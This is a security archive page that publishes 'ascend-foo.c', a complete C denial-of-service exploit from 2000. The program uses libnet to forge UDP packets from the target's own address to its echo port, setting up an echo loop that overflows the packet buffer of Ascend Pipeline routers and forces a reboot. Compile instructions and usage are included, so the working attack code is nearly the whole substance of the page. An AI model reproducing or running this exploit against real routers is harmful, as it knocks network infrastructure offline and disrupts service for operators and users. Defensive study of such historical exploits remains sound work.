exploit the possibilities

ascend-foo.c

ascend-foo.c
Posted Feb 11, 2000
Authored by teso

DoS ascend router with simple udp echo<->echo link

tags | udp
MD5 | d7322e75c24e815ff0e4380d0e57de18

ascend-foo.c

Change Mirror Download
/* ascend foo denial of service exploit
* 1999/09/25
*
* basically just another lame echo/echo link, but has nice results on ascend,
* you can increase the lag in steps of 2ms by sending one packet, after some
* few hundret ms lag you overflow the internal packet buffer and the whole
* connection stalls, the router has to be rebooted.
*
* by scut and hendy / team teso [http://teso.scene.at/]
*
* compile with: gcc -o ascend-foo ascend-foo.c -Wall -lnet -DLIBNET_LIL_ENDIAN
* works fine against Ascend Pipeline * modells, haven't tried against others
*/

#include <stdio.h>
#include <libnet.h>

int
main (int argc, char **argv)
{
int sock, c;
u_long src_ip;
u_char *buf;
u_char *qbuf;
int qbuf_s = 0;

printf ("ascend-foo, udp echo dos attack\nby scut / team teso\n\n");
if (argc < 2) {
printf ("usage: %s <srcip> [packetsize]\n\n", argv[0]);
exit (EXIT_FAILURE);
} else if (argc == 2) {
qbuf_s = 73;
} else {
qbuf_s = atoi (argv[2]);
}
qbuf = malloc (qbuf_s);

src_ip = libnet_name_resolve (argv[1], 0);

if (src_ip == 0) {
printf ("invalid syntax\n");
exit (EXIT_FAILURE);
}

buf = calloc (1, (UDP_H + IP_H + qbuf_s));
if (buf == NULL) {
perror ("No memory for packet");
exit (EXIT_FAILURE);
}

libnet_seed_prand ();

sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror ("No socket");
exit (EXIT_FAILURE);
}

libnet_build_ip ( UDP_H + qbuf_s, /* content size */
0, /* tos */
0, /* id */
0, /* frag */
64, /* ttl */
IPPROTO_UDP, /* subprotocol */
src_ip, /* heh ;) */
src_ip,
NULL, /* payload already there */
0, /* same */
buf); /* build in packet buffer */

libnet_build_udp ( 7, /* source port */
7,
qbuf, /* content already there */
qbuf_s, /* same */
buf + IP_H); /* build after ip header */

libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + qbuf_s);

c = libnet_write_ip (sock, buf, UDP_H + IP_H + qbuf_s);
if (c < UDP_H + IP_H + qbuf_s) {
printf ("write_ip wrote too less bytes\n");
}
printf ("completed, wrote %d bytes to victim router\n", c);

free (buf);

return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close